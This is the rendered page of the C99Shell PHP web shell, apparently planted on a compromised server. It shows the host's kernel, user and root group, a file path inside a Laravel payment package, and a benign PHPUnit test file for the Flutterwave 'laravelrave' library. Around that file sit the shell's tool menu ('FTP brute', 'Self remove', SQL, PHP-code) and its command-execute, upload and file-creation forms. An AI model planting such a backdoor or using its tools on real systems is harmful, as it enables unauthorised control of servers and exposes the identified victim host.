!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/kingflamez/laravelrave/tests/Unit/   drwxr-xr-x
Free 28.88 GB of 117.98 GB (24.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     UnitTests.php (2.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Tests\Unit;

use 
Carbon\Carbon;
use 
Tests\TestCase;
use 
ReflectionClass;
use 
ReflectionProperty;
use 
KingFlamez\Rave\Rave;
use 
Tests\Stubs\PaymentEventHandler;
use 
Tests\Concerns\ExtractProperties;

class 
UnitTests extends TestCase
{

    use 
ExtractProperties;

    
/**
     * Tests if app returns \KingFlamez\Rave\Rave if called with ailas.
     *
     * @test
     * @return \KingFlamez\Rave\Rave
     */
    
function initiateRaveFromApp()
    {

        
$rave $this->app->make("laravelrave");

        
$this->assertTrue($rave instanceof Rave);

        return 
$rave;
    }

    
/**
     * Test Rave initiallizes with default values;.
     *
     * @test
     *
     * @depends initiateRaveFromApp
     * @param \KingFlamez\Rave\Rave $rave
     * @return void
     * @throws \ReflectionException
     */
    
function initializeWithDefaultValues(Rave $rave)
    {

        
$reflector = new ReflectionClass($rave);

        
$methods $reflector->getProperties(ReflectionProperty::IS_PROTECTED);

        foreach (
$methods as $method) {
            if (
$method->getName() == 'baseUrl'$baseUrl $method;
            if (
$method->getName() == 'secretKey'$secretKey $method;
            if (
$method->getName() == 'publicKey'$publicKey $method;
        };

        
$baseUrl->setAccessible(true);
        
$publicKey->setAccessible(true);
        
$secretKey->setAccessible(true);

        
$this->assertEquals($this->app->config->get("flutterwave.secretKey"), $secretKey->getValue($rave));
        
$this->assertEquals($this->app->config->get("flutterwave.publicKey"), $publicKey->getValue($rave));
        
$this->assertEquals(
            
"https://api.flutterwave.com/v3",
            
$baseUrl->getValue($rave)
        );
    }

    
/**
     * Tests if transaction reference is generated.
     *
     * @test
     * @depends initiateRaveFromApp
     * @param Rave $rave
     * @return void
     */
    
function generateReference(Rave $rave)
    {

        
$ref $rave->generateReference();

        
$prefix 'flw';

        
$this->assertRegExp("/^{$prefix}_\w{13}$/"$ref);
    }

    
/**
     * Testing if keys are modified using setkeys.
     *
     * @test
     * @depends initiateRaveFromApp
     * @param Rave $rave
     * @return void
     * @throws \ReflectionException
     */
    
function settingKeys(Rave $rave)
    {

        
$newPublicKey "public_key";
        
$newSecretKey "secret_key";
        
$rave->setKeys($newPublicKey$newSecretKey);
        
$reflector = new ReflectionClass($rave);
        
$reflector $reflector->getProperties(ReflectionProperty::IS_PROTECTED);

        
$keys array_map(function ($value) use ($rave$newPublicKey$newSecretKey) {
            
$name $value->getName();
            if (
$name === "publicKey" || $name === "secretKey") {
                
$value->setAccessible(true);
                
$key $value->getValue($rave);
                
$this->assertEquals(${"new" ucfirst($name)}, $key);
            }
        }, 
$reflector);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--